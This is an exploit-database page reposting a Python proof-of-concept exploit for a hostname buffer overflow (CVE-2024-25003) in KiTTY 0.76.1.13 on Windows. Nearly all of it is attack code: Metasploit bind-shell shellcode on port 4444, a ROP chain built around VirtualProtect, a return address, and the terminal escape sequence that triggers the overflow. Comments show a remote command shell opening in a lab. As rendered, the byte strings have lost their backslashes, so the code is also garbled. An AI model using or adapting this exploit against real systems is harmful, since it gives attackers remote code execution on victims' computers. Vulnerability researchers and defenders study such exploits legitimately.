دروازه امنیت

security gate



KiTTY 0.76.1.13 Start Duplicated Session Hostname Buffer Overflow

2024-03-28
DEFCESCO
Risk: high.
Local: No
Remote: Yes
CVE:
CWE: CWE-119
SGDB: SGDB-27453
dork:

# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: 2024-25003 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(windows/shell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444) # #-------------------------------------------------------------------------------------# import sys import os import struct #---------------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > generate -b 'x00x07x0ax0dx1bx9cx3Ax40' -f py # # windows/shell_bind_tcp - 375 bytes # # https://metasploit.com/ # # Encoder: x86/xor_poly # # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, # # PrependMigrate=false, EXITFUNC=process, CreateSession=true, # # AutoVerifySession=true # #---------------------------------------------------------------------------------------------# buf = b"" buf += b"x51x53x56x57xdbxd9xd9x74x24xf4x5fx41" buf += b"x49x31xc9x51x59x90x90x81xe9xaexffxff" buf += b"xffxbexd4xa1xc4xf4x31x77x2bx83xefxfc" buf += b"x51x59x90xffxc9x75xf3x5fx5ex5bx59x28" buf += b"x49x46xf4xd4xa1xa4x7dx31x90x04x90x5f" buf += b"xf1xf4x7fx86xadx4fxa6xc0x2axb6xdcxdb" buf += b"x16x8exd2xe5x5ex68xc8xb5xddxc6xd8xf4" buf += b"x60x0bxf9xd5x66x26x06x86xf6x4fxa6xc4" buf += b"x2ax8exc8x5fxedxd5x8cx37xe9xc5x25x85" buf += b"x2ax9dxd4xd5x72x4fxbdxccx42xfexbdx5f" buf += b"x95x4fxf5x02x90x3bx58x15x6exc9xf5x13" buf += b"x99x24x81x22xa2xb9x0cxefxdcxe0x81x30" buf += b"xf9x4fxacxf0xa0x17x92x5fxadx8fx7fx8c" buf += b"xbdxc5x27x5fxa5x4fxf5x04x28x80xd0xf0" buf += b"xfax9fx95x8dxfbx95x0bx34xfex9bxaex5f" buf += b"xb3x2fx79x89xc9xf7xc6xd4xa1xacx83xa7" buf += b"x93x9bxa0xbcxedxb3xd2xd3x5ex11x4cx44" buf += b"xa0xc4xf4xfdx65x90xa4xbcx88x44x9fxd4" buf += b"x5ex11x9exdcxf8x94x16x29xe1x94xb4x84" buf += b"xc9x2exfbx0bx41x3bx21x43xc9xc6xf4xc5" buf += b"xfdx4dx12xbexb1x92xa3xbcx63x1fxc3xb3" buf += b"x5ex11xa3xbcx16x2dxccx2bx5ex11xa3xbc" buf += b"xd5x28xcfx35x5ex11xa3x43xc9xb1x9ax99" buf += b"xc0x3bx21xbcxc2xa9x90xd4x28x27xa3x83" buf += b"xf6xf5x02xbexb3x9dxa2x36x5cxa2x33x90" buf += b"x85xf8xf5xd5x2cx80xd0xc4x67xc4xb0x80" buf += b"xf1x92xa2x82xe7x92xbax82xf7x97xa2xbc" buf += b"xd8x08xcbx52x5ex11x7dx34xefx92xb2x2b" buf += b"x91xacxfcx53xbcxa4x0bx01x1ax34x41x76" buf += b"xf7xacx52x41x1cx59x0bx01x9dxc2x88xde" buf += b"x21x3fx14xa1xa4x7fxb3xc7xd3xabx9exd4" buf += b"xf2x3bx21" def shellcode(): sc = b'' sc += b'xBBx44x24x44x44' # mov ebx,0x44442444 sc += b'xB8x44x44x44x44' # mov eax,0x44444444 sc += b'x29xD8' # sub eax,ebx sc += b'x29xC4' # sub esp,eax sc += buf sc += b'x90' * (1052-len(sc)) assert len(sc) == 1052 return sc def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe] 0x006424a4, # ptr to &amp;VirtualProtect() [IAT kitty.exe] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe] 0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe] #[---INFO:gadgets_to_set_ebp:---] 0x00429953, # POP EBP # RETN [kitty.exe] 0x005405b0, # push esp; ret 0 [kitty.exe] #[---INFO:gadgets_to_set_ebx:---] 0x0049d9f9, # POP EBX # RETN [kitty.exe] 0x00000201, # 0x00000201-> ebx #[---INFO:gadgets_to_set_edx:---] 0x00430dce, # POP EDX # RETN [kitty.exe] 0x00000040, # 0x00000040-> edx #[---INFO:gadgets_to_set_ecx:---] 0x005ac58c, # POP ECX # RETN [kitty.exe] 0x004d81d9, # &amp;Writable location [kitty.exe] #[---INFO:gadgets_to_set_edi:---] 0x004fa404, # POP EDI # RETN [kitty.exe] 0x005a2001, # RETN (ROP NOP) [kitty.exe] #[---INFO:gadgets_to_set_eax:---] 0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe] 0x90909090, # nop 0x41414141, # Filler (compensate) #[---INFO:pushad:---] 0x005dfbac, # PUSHAD # RETN [kitty.exe] ] return b''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() #----------------------------------------------------------------------------------# # Badchars: x00x07x0ax0dx1bx9cx3Ax40 # # Return Address Information: 0x0052033c : {pivot 332 / 0x14c} : # # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN # # ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} # # Shellcode size at ESP: 1052 # #----------------------------------------------------------------------------------# return_address = struct.pack('<I', 0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} rop_chain_padding = b'x90' * 35 nops = b'x90' * 88 escape_sequence = b'33]0;__dt:' + shellcode() + return_address escape_sequence += rop_chain_padding + rop_chain escape_sequence += b'x90' escape_sequence += b"xE9x2AxFAxFFxFF" #jmp $eip-1490 escape_sequence += nops + b'07' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush()



contact :

Comment it here.


(*) - required fields.  
twitter(X): @securitygateorg / telegram: @orgsecuritygate / instagram: @securitygateorg

Copyright 2024, securitygate.org